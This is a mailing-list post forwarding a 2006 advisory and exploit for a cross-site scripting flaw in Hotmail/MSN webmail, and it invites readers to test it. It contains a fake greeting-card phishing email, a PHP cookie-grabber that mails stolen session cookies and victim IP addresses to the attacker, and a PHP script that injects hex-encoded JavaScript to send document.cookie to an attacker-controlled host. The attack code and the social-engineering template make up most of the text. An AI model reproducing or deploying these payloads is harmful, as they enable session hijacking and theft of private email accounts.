[linuxtechbiz] Hotmail/MSN Cross Site Scripting Exploit

[Ritesh Agrawal]

Hi All,
    Following XSS code form a mailing list. Any c0der can  test this
vulnerblity and exploit code.

-R


Hotmail/MSN Cookie Theft Advisory/Xploit        Reply with quote
/* Hotmail/MSN Cross Site Scripting Exploit

Author: Simo Ben youssef aka _6mO_HaCk
Contact: Simo_at_morx_dot_org
Discovered: September 15 2005
Published: February 20 2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0 (designed for) firefox 1.5 and Opera (should work on all
browsers)
Original Advisory/Xploit: http://www.morx.org/HotmailCookieXploit.txt
Morx Security Research Team
http://www.morx.org

Description:

Exploit written in PHP to exploit the $a variable cross site scripting
vulnerability inside Hotmail/MSN inbox. Exploit requires the victim to
open the email sent by the attacker and click on a URL, therefore some
Social Engineering skills are required too

Notice: if you dont know what's cross site scripting or/and how its
being exploited then just stop reading by here as you will have to
modify some things on the exploit to make it work for you, but if you
insist then good luck.

Exploitation:

Exploiting this flaw seemed to be almost impossible on Internet
Explorer Browsers, because the vulnerable variable resides inside the
hotmail inbox and its value has to be correct and we cant avoid it,
replace it or guess it in anyway, at this point it was ok while it was
possible to get the victim click on the url and grab the entire HTTP
referrer add our malicious code at the end of the variable value and
redirect the victim back to the HTTP referrer with one single script,
this worked just fine on firefox while it didnt work on IE beacause
hotmail filters <a href="" and replace it with _javascript_:ol(); so
the link opens a new internet explorer window, and of course when IE
opens another window it doesnt send the HTTP referrer where from the
link was opened previously, so one way to exploit this was to insert
an <img src="" and make it point to a php script in order to grab the
HTTP referrer of the victim, reconstruct it, add _javascript_ code at
the end of the $a variable value and then open another php script in
the same server and write on it some php code to make an automatic
redirection to the re constructed HTTP referrer when the victim
clicks on the second link, and therefore get the malicious code
executed which will grab the user authentification cookie and send it
to the attacker script giving the attacker full access to the victim
inbox for 24 hours, which's the default time set in hotmail for cookie
expiration :)
Exploiting this vulnerability can be done by uploading the following
script to a php enabled webserver then send an email to the victim
with <img src="" href="http://www.attacker-server.com/a.php">http://www.attacker-server.com/a.php"> where a.php is
the php exploit file name and <a
href="" href="http://http://www.attacker-server.com/ecard.php">http://http://www.attacker-server.com/ecard.php"> is the link of
the second script (the one that get created by a.php) as i said some
Social Engineering skills are required, so as an example the email can
be sent as a greeting card with the following HTML code, you may also
need to modify some things on the php exploit to make it fit your needs.
Hello, </p>
Jennifer has just sent you a greeting card. </p>
To view your greeting card, click on the link below: </p>
<a href="" href="http://attacker-site/ecard.php">http://attacker-site/ecard.php"> http://
lycos.americangreetings.com/view.pd?i=197489639&amp;m=8381&amp;rr=y&amp;source=lycos
</a> </p>
Or copy and paste the above link into your web browser's address
window</p>
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at
www.americangreetings.com</p>
Thanks for using Lycos Greetings with AmericanGreetings.com
<img src="" href="http://attacker-site/a.php">http://attacker-site/a.php"></img>

as a cookie grabber you may use the following code:

$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("youremail.org", $subject, $msg);

header ("location:
http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");

at the end i would like to say a big thanks to mat
(mattzew5_at_hotmail_dot_com) for helping me research and test this
exploit, it took several days of research to exploit this flaw, so once
again thanks mat

greets to all MorX members and especially to BlooDMASK even though he
refused to let me test this on his hotmail account, certainly thats
because he has some nice xxx passwords on it :) also greets to barbenoir
(boule7ia), th3-brain, Dragos and everybody else.

Why am i publishing this late ?

because i found better flaws in hotmail which i wont be releasing anytime
soon :)

Workaround:

avoid clicking on links while being autentified.

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.

------------------------ Hotmail/MSN accounts XSS Xploit by Simo Ben
youssef ---------------------- */
      Code:
      
<?php

/* file name of the script that's the victim will visit
make sure your webserver has writting permissions
otherwise create ecard.php manualy and chmod it to 777 or whatever */

$file = "ecard.php";

// get the http referrer that we get with <img

$HTTP_REFERER = getenv("HTTP_REFERER");

$host = $HTTP_REFERER;

// reconstruct the http referrer

// get the &curmbox string position

$first = strpos($host, '&curmbox');

// get the first url part based on $curmbox position

$firstpart = substr($host, 0, $first);

// get the second url part

$secondpart = substr($host, $first);

/* split the second part and list the first
 two variables since hotmail dublicate those sometimes */

list($a, $b, $c) = split('[&]', $secondpart);

// put all the above together

$target = "$firstpart&$a$b&$c";

$fo = fopen($file, 'w+');

// change this to your cookie grabber address, dont include "http://" as
its already included in hex
// the variable name for the cookie grabber should be included too

$d = 'www.attacker-site.com/cookie-grabber.php?cookie';

// first _javascript_ hex code

$e =
'%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F';

// second _javascript_ hex code

$f =
'%3D%27%2B%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%2E%73%75%62%73%74%72%28%30%2C%31%39%30%30%29%3C%2F%73%63%72%69%70%74%3E';

// convert the cookie grabber url to hex code and add "%" at the first of
each hex caracter

$converted = bin2hex($d);

$converted = chunk_split($converted, 2, '%');

$converted = '%' . substr($converted, 0, strlen($converted) - 1);

$data = '' . $target . '' . $e . '' . $converted
. '' . $f .'"); ?>';

/* write the data that would redirect the victim to the reconstructed http
referrer and exploit the vulnerable variable and make the cookie
redirection */

fwrite($fo, $data);

fclose($fo);

?> 






    


  
  
    SPONSORED LINKS
  
          
                  
            
        Computer security
      
                      
        Communication and networking
      
                      
        Computer memory
      
              
                        
            
        Computer training
      
                    
           
  







  
  
  YAHOO! GROUPS LINKS



   Visit your group "linuxtechbiz" on the web. 
   To unsubscribe from this group, send an email to: [EMAIL PROTECTED] 
   Your use of Yahoo! Groups is subject to the Yahoo! Terms of Service.